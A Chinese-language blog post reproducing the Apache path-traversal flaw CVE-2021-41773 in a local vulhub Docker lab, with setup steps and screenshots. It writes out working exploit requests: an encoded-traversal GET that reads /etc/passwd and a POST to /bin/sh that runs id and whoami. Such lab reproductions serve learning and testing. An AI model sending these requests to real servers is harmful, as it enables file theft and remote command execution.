CVE-2021-41773漏洞复现

旧城等待, 2023-10-12 18:56 155阅读 0赞

漏洞名称:CVE-2021-41773

漏洞原理:路径穿越漏洞

漏洞库:

76e1ed85fb99410c96e8e41e6fca268b.png

实验环境:

实验机:kali linux 192.168.244.148,Docker环境

实验步骤:

1.在git下来的vulhub目录下执行docker-compose build和docker-compose up -d命令以复现漏洞环境。

94cd246b52e74e84b33cab195dcdbbe9.png

2.使用ifconfig命令查看自己本机ip

2ddbb27d1e7a40bc9cc81a64286e5a5f.png

3.在浏览器中输入http://192.168.244.148:8080访问环境

39efddcf25e8483fa35cf48eb822a9b0.png

4.打开Burpsuite,在火狐浏览器设置手动代理

d8b748f9c4d746ad8decdebed4d162cf.png

5.使用Burpsuite进行抓包

b515235a0dd64643b0c0c5e0bc776341.png

6.右键选择send to Reapeter后,构造参数

GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1

c6755ff1100549aeb9e8cba28fea5adc.png

7.发送后得到如下结果

71072951a4bd464f982f419ccaa32533.png

8.右键change request method改为post,构造参数

POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1

echo Content-Type: text/plain; echo; id

可以看到漏洞被执行。

20885a1c343c4f74833d1605c8f7eb7e.png

9.更改参数执行whoami命令,发现可以执行

92c3f13be2b04e62838f3db7ba713830.png

发表评论

表情:
评论列表 (有 0 条评论,155人围观)

还没有评论,来说两句吧...

相关阅读